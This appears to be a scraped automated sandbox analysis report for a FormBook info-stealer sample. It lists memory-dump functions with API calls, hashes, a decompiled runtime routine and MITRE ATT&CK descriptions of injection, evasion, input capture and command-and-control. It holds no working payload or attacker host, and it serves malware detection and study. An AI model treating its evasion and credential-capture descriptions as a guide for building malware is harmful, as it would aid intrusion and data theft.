Opcode ID: 29b96301ce86a321c34fcf99bdc13038becddad2d402c82bbdb7f1ba321fd13d
Instruction ID: 3a925a25b68943f560a606547f53a4c3d78926962515c7869154d28d89da4ce2
Opcode Fuzzy Hash: 29b96301ce86a321c34fcf99bdc13038becddad2d402c82bbdb7f1ba321fd13d
Instruction Fuzzy Hash: 8011CC31685218BADF2876949C43FFE77686F40750F198159FE08FB5C2D6A8A90187E1

Uniqueness

Uniqueness Score: -1.00%

Function 00786EE0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00786F88

Strings

wininet.dll, xrefs: 00786F3E, 00786F47
net.dll, xrefs: 00786F51, 00786FD7, 00786FAF, 00786FBB, 00786FE3

Memory Dump Source

Source File: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 3cf8dc3d043e4b09e7c3be10fa095d5bc1aff0a0310ad618026a8bc61f66f4f7
Instruction ID: cd9ec482716973f5a587a9a33a19021c5cf1cbff9e8b1ece7f46bc28b47ab610
Opcode Fuzzy Hash: 3cf8dc3d043e4b09e7c3be10fa095d5bc1aff0a0310ad618026a8bc61f66f4f7
Instruction Fuzzy Hash: BE31AFB1642704BBC711EFA8D8A1FA7B7B8FB48700F00841DF61A5B241D734E445CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00786ED6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 82sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00786F88

Strings

wininet.dll, xrefs: 00786F3E, 00786F47
net.dll, xrefs: 00786F51, 00786FAF, 00786FBB

Memory Dump Source

Source File: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 9cd293e250ea68cc2e70eddd5f5ff524ad0f934c9d9d99968bd849f694ffffdb
Instruction ID: 23b93931d4aa5969d26dcd0432c4fe574ec3d0fb7d7f375a5ac8f4c8bf4d5001
Opcode Fuzzy Hash: 9cd293e250ea68cc2e70eddd5f5ff524ad0f934c9d9d99968bd849f694ffffdb
Instruction Fuzzy Hash: 4E31C1B1641300BBC720EF68D8A1FABBBB4FB88700F14815DF61A6B241D774A445CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 007884C3, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00773B93), ref: 007884FD

Strings

.z`, xrefs: 007884EC, 007884F8

Memory Dump Source

Source File: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: dfa90b8a887f4c61a78848a8c4dee925a4d7deb2f9042a53f2d2e5a4ebbab4ec
Instruction ID: 362891d4999cfd33060f24f8d774304d64bf6bb0e073c23153290aa6f34ab003
Opcode Fuzzy Hash: dfa90b8a887f4c61a78848a8c4dee925a4d7deb2f9042a53f2d2e5a4ebbab4ec
Instruction Fuzzy Hash: 80F0E279204305BFD714DF69CC41EE77BA9AF89341F004A59F94817642CA30ED04CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 007884D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00773B93), ref: 007884FD

Strings

.z`, xrefs: 007884EC, 007884F8

Memory Dump Source

Source File: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 9502853688d585e1662473f74d6fa25aa2202555732cfca302fe8175cf0b7a30
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 91E01AB1200204ABD714EF59CC49EA777ADAF88750F014554F90857241CA30E9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 00777260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 007772BA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 007772DB

Memory Dump Source

Source File: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
Instruction ID: ff42af236034a059f7ae577fb17baaf96058fec481c7dc255c83b62bd7a322c1
Opcode Fuzzy Hash: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
Instruction Fuzzy Hash: E701A731A81228B6EB24B6949C47FFE776CAB40F90F154115FF08BA1C2E698790687F5

Uniqueness

Uniqueness Score: -1.00%

Function 00779B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00779B92

Memory Dump Source

Source File: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: a26d393e6fb3dc0d1cabac0afc394cdf588de138adca9a407a0e7039bbd9041f
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: 94011EB5D4020DFBDF10EAA4EC46F9DB7B89B54308F008195AA0897251F635EB14CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00788502, Relevance: 1.5, APIs: 1, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00783516,?,00783C8F,00783C8F,?,00783516,?,?,?,?,?,00000000,00000000,?), ref: 007884BD

Memory Dump Source

Source File: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f7b0917c9bb85802fcec0dc606b2087cefcff6739f1530dd9375cf2e39ac08c0
Instruction ID: e4f7f7d19c01aae7e67a88c6244f8c8193b4bab899dbdd3462e7d8f1a31ff5ef
Opcode Fuzzy Hash: f7b0917c9bb85802fcec0dc606b2087cefcff6739f1530dd9375cf2e39ac08c0
Instruction Fuzzy Hash: 27F081B6240214ABDB24EF64DC85FE77759EF89360F114559FA0CAB281CA31E910CBF1

Uniqueness

Uniqueness Score: -1.00%

Function 00788540, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00788594

Memory Dump Source

Source File: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: cb50f1c7b9bdf46fc81468551db411d4a6a688a18b0f4d987d98578c91761fc9
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: D301AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97241CA30E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00787010, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0077CCD0,?,?), ref: 0078704C

Memory Dump Source

Source File: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
Instruction ID: 36ecaaab7cd8a470cddff6dea90e79ef92518c8a14ef3c57068ce7962ec20702
Opcode Fuzzy Hash: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
Instruction Fuzzy Hash: 0DE06D333D02043AE23075999C02FA7B39C8B81B20F550026FA0DEA2C1D599F80143A4

Uniqueness

Uniqueness Score: -1.00%

Function 00788490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00783516,?,00783C8F,00783C8F,?,00783516,?,?,?,?,?,00000000,00000000,?), ref: 007884BD

Memory Dump Source

Source File: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: d234a424a3364f22648e43502a09b7e5bb80526a3b2c4522d0612f9b63738c44
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 54E012B1200208ABDB14EF99CC45EA777ADAF88760F118558FA085B282CA30F9108BF0

Uniqueness

Uniqueness Score: -1.00%

Function 00788630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0077CFA2,0077CFA2,?,00000000,?,?), ref: 00788660

Memory Dump Source

Source File: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: a3116736690237cd03a53cb313e37fe2b2d2d68d559c4771f21a87a5dff49d5d
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: D1E01AB1200208ABDB10EF49CC85EE737ADAF88750F018554FA0857241C934E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0077D410, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00777C63,?), ref: 0077D43B

Memory Dump Source

Source File: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction ID: 1b61dddc209bcd2c02945f80c6cffaf7977da8bbe7397e9986ec3e02421518ad
Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction Fuzzy Hash: 1CD05E617903043AEA10BAA8DC07F2632885B54B40F494064F949A62C3D968E9004661

Uniqueness

Uniqueness Score: -1.00%

Function 04A1967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04A19694

Memory Dump Source

Source File: 00000005.00000002.606774406.00000000049B0000.00000040.00000001.sdmp, Offset: 049B0000, based on PE: true

Associated: 00000005.00000002.608894577.0000000004ACB000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.608906653.0000000004ACF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8e28b34ad686a037b66ab5b087b60892e3ce9cbbdcadfd2befab2361b66682b3
Instruction ID: b21423cf5cb5c78db6ca019a9693870313defbee06f723209aa3aeae0bf9a404
Opcode Fuzzy Hash: 8e28b34ad686a037b66ab5b087b60892e3ce9cbbdcadfd2befab2361b66682b3
Instruction Fuzzy Hash: CFB09BB19015D5C5F711D7744708717790477D0755F26C051D2120641B4778D091F5B6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04A6FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E04A6FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04A1CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04A65720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04A65720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x04a6fdda
0x04a6fde2
0x04a6fde5
0x04a6fdec
0x04a6fdfa
0x04a6fdff
0x04a6fe0a
0x04a6fe0f
0x04a6fe17
0x04a6fe1e
0x04a6fe19
0x04a6fe19
0x04a6fe19
0x04a6fe20
0x04a6fe21
0x04a6fe22
0x04a6fe25
0x04a6fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04A6FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04A6FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04A6FE01

Memory Dump Source

Source File: 00000005.00000002.606774406.00000000049B0000.00000040.00000001.sdmp, Offset: 049B0000, based on PE: true

Associated: 00000005.00000002.608894577.0000000004ACB000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.608906653.0000000004ACF000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: f789eebdec95927620f94fcf13f2119096d3100950963211cf959358d0603043
Instruction ID: 37e0ad67dabff74a2f1b13f9e70743f2da20347f811faac65597961a74d90982
Opcode Fuzzy Hash: f789eebdec95927620f94fcf13f2119096d3100950963211cf959358d0603043
Instruction Fuzzy Hash: B2F02B76640601BFEB201B45ED02F23BF6AEB84730F140354F628565E1EA62F83097F5

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 9JzK89dRiaBYTuN.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Function 00418270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 004181C0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Function 0041839A, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Function 004183A0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Function 004182F0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON